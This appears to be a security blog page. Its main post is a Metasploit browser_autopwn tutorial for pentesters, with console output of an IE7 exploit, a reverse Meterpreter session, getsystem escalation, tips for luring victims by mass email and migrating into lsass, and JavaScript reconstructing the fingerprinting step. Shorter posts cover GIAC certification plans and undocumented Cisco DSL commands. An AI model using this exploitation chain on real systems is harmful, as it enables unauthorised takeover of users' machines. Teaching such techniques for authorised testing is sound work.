browser exploitation with metasploit

After talking with a few people who have done the SANS SEC560 (GPEN) course and challenging the exam myself, one thing I felt was missing regarding metasploit was the browser exploitation features. With pentesting and exploitation in general having focused on client-side attacks for a while now, I thought the course could probably benefit from something like this. First you’ll need to start up metasploit and load the server/browser_autopwn module:

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
       =[ svn r9403 updated 3 days ago (2010.06.03)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

From here, the only option we need to change in order to get some basic functionality working is LHOST, the address the reverse payloads will connect back to (so it must be one the victims can reach). Of course, unless you want to type out the long random URIPATH string, you might want to set that too. Once those options are set, we can run the exploit:

msf auxiliary(browser_autopwn) > set URIPATH testing
URIPATH => testing
msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22
LHOST => 192.168.0.22
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.0.22...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n
[*]  Local IP: http://192.168.0.22:8080/90Yiozy7u9n
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGIjmqty
[*]  Local IP: http://192.168.0.22:8080/xGIjmqty
[*] Server started.

<- cut ->

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.22:3333
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.22:6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/testing
[*]  Local IP: http://192.168.0.22:8080/testing
[*] Server started.

Now on our client we browse to the URL listed above as the ‘Local IP’, in this case http://192.168.0.22:8080/testing (the 0.0.0.0 URL is just the bind address and is not reachable from anywhere else). Once that is done, you can check the metasploit console window and you will see:

[*] Request '/testing' from 192.168.0.5:64865
[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865
[*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866...
[*] Sending stage (748032 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type         Information                   Connection
  --  ----         -----------                   ----------
  1   meterpreter  vistavm\testadmin @ VISTAVM  192.168.0.22:3333 -> 192.168.0.5:64867

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > idletime
User has been idle for: 2 mins 46 secs
meterpreter >
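What happened between the two requests above is worth seeing in code. The first hit on /testing only serves a fingerprinting page; the browser’s own JavaScript then reports what it found by requesting the same path again with a sessid parameter, and that value is nothing more than the base64 of the “JavaScript Report” line (V2luZG93czpW... decodes to Windows:Vista:undefined:en-us:x86:MSIE:7.0:). The following is an added example that reconstructs that round-trip and the matching step behind “Responding with exploits”; it is not the browser_autopwn module’s own code, and the field labels, the navigator-like object and the exploit catalog with its targeting constraints are assumptions made for illustration. It is JavaScript because the fingerprinting side runs in the victim’s browser; run it under Node.js.

```javascript
// Added example: a reconstruction of the fingerprint round-trip behind the
// "JavaScript Report" line above. This is NOT the browser_autopwn module's own
// code; the field labels, the navigator-like object and the exploit catalog
// below are assumptions made for illustration. Runs under Node.js.

// Field order taken from the report "Windows:Vista:undefined:en-us:x86:MSIE:7.0:".
// The labels are my reading of each position, not the module's variable names.
const FIELDS = ["os_name", "os_flavor", "os_sp", "os_lang", "arch", "ua_name", "ua_version"];

// Client side: join what the page's JavaScript detected into one string.
// A field the browser could not detect comes through as "undefined", which
// is exactly what the third position of the logged report shows.
function buildReport(nav) {
  return FIELDS.map((f) => String(nav[f])).join(":") + ":";
}

// Base64 keeps the colons and locale strings safe in a query parameter; the
// "=" padding is URL-encoded, hence the %3d%3d at the end of the logged URL.
function encodeSessid(report) {
  const b64 = Buffer.from(report, "utf8").toString("base64");
  return encodeURIComponent(b64); // encodeURIComponent emits %3D (upper case)
}

// The second request the browser makes: same URIPATH plus ?sessid=<fingerprint>.
function reportUrl(basePath, nav) {
  return basePath + "?sessid=" + encodeSessid(buildReport(nav));
}

// Server side: turn the request line back into a fingerprint object.
// Returns null for the first, fingerprint-less hit (the plain "/testing").
function parseSessid(requestPath) {
  const q = requestPath.indexOf("?");
  if (q === -1) return null;
  const sessid = new URLSearchParams(requestPath.slice(q + 1)).get("sessid");
  if (!sessid) return null;
  const report = Buffer.from(sessid, "base64").toString("utf8");
  const parts = report.split(":");
  const fingerprint = {};
  FIELDS.forEach((f, i) => { fingerprint[f] = parts[i] === undefined ? "" : parts[i]; });
  return { report, fingerprint };
}

// Constructed catalog. The names come from the post's console output; the
// targeting constraints are illustrative guesses, not the real modules' checks.
const CATALOG = [
  { name: "multi/browser/firefox_escape_retval", ua_name: "Firefox" },
  { name: "multi/browser/mozilla_compareto", ua_name: "Firefox" },
  { name: "Internet Explorer 7 Uninitialized Memory Corruption Vulnerability",
    os_name: "Windows", ua_name: "MSIE", ua_version: "7.0" },
];

// "Responding with exploits": a module is sent only if every constraint it
// states matches the fingerprint; a constraint it does not state matches anything.
function selectExploits(fingerprint, catalog) {
  return catalog
    .filter((m) => Object.keys(m).every((k) => k === "name" || m[k] === fingerprint[k]))
    .map((m) => m.name);
}

// Walk the exchange from the post using the request line it logged.
const logged = "/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d";
const hit = parseSessid(logged);
console.log("JavaScript Report:", hit.report);
console.log("Responding with exploits:", selectExploits(hit.fingerprint, CATALOG));

// And the other direction, from a constructed navigator-like object, which
// reproduces the logged sessid value (apart from %3D vs %3d case).
const constructedNav = { os_name: "Windows", os_flavor: "Vista", os_sp: undefined,
  os_lang: "en-us", arch: "x86", ua_name: "MSIE", ua_version: "7.0" };
console.log(reportUrl("/testing", constructedNav));
```

The practical point for a pentester is that nothing here is hidden from the client: the fingerprint goes over the wire as plain base64, and a proxy or IDS that decodes the sessid parameter sees exactly the same report the msf console prints. It also shows why only one exploit was sent to the Vista/IE7 host even though fifteen modules were started.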

Now, how would you go about getting clients/victims to visit this in a pentest? An organisation-wide mass email pointing at the URL is probably the easiest way (within the agreed scope of the engagement, of course). Also, if you start the msfconsole session as root you can set SRVPORT to 80, which looks far less suspicious to the target than :8080; root is needed because ports below 1024 are privileged, and nothing else can already be listening on that port.

You will also likely want to migrate to a more stable process within meterpreter in case the user closes their browser, which would take your session with it. Under meterpreter run ‘ps’ to list the running processes, pick a long-lived one of the same architecture (for example, winlogon or lsass, which you can only migrate into once you have SYSTEM, as in the getsystem step above; explorer.exe is the usual choice for a plain user session) and run ‘migrate’ with its PID so your session stays connected. Be careful with lsass: if it crashes while you are inside it, Windows reboots the machine.

GPEN passed

The goal for the next year is to pass the GIAC GSE (GIAC Security Expert), probably by visiting Vegas (again!) next year. The GSE has a few pre-requisites in the form of GCIH, GCIA, GSEC and 2 ‘electives’ (other GIAC exams). Since I passed the GPEN exam, which will be an elective, I need to focus on getting the 3 cores done, which will probably be GCIH first, then tackle GSEC and GCIA.

As all this is self-funded I’ll likely just be reading books on the various topics rather than the actual GIAC material, but we’ll see how that pans out.

Packet Life Community Lab

Thinking of doing a specific Cisco certification (CC[NA|NP|IP|IE])? Then you might be interested in the Community Lab provided by Packet Life.

The ‘Community Lab’ is divided into 2 blocks of identical equipment. You can book one block or both, free of charge. Bookings currently run well into March, so it might be a while before you can get access.

Donations are encouraged, but not required in order to get access. Definitely an option if you can’t afford the lab prices offered by the various vendors to get some lab time.

ADSL issues

I recently changed ISPs to a cheaper plan (not by much) which provides more quota (about 40GB) per month than what I was getting from my previous provider. Along with this, I went to the 8Mb DSL plan whereas previously I was on the 1.5Mb. When you start getting higher speeds, a lot of other factors come into how stable your connection is. Before I made any changes, my atm0/0/0 interface was looking like:

Speed (kbps): 7300
Noise Margin: 6.0 dB


A noise margin of 6.0 dB turns out to be the bare minimum you would want to have, as it’s the borderline between a stable connection and the connection from hell. As I have been having connection issues lately, I decided to do some googling. On a few sites I came across some undocumented Cisco commands, one of which was “service internal”. Normally on an ATM interface you will see something like:

adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
lom Loss Of Margin watch counter for line retrain
operating-mode auto or specific ADSL mode

After going into config mode and enabling service internal:

adsl-gw(config)#service internal
adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
gain-setting ADSL programmable gain setting
lom Loss Of Margin watch counter for line retrain
max-tone-bits set maximum bits per tone limit
noise-margin set noise margin offset
operating-mode auto or specific ADSL mode
power-cutback Noise Threshold for Power CutBack

Voila. The setting I wanted to play with was the noise-margin. After setting the noise margin with “dsl noise-margin 2” (settings between -3 and 3 are accepted; the higher the value, the more margin the modem holds back, so the more stable the sync at the cost of speed) my DSL stats now say:

Noise Margin: 7.5 dB
Speed (kbps): 6592

The noise-margin now sits between 7.5 and 9 dB, which is optimal. The other setting I can try is increasing the noise-margin to 3, however I will sync at around 6200 kbps once that’s done. Since “service internal” unlocks unsupported commands intended for Cisco’s own use, it is worth turning it off again with “no service internal” once the change has been made.

More undocumented Cisco commands here, here and here.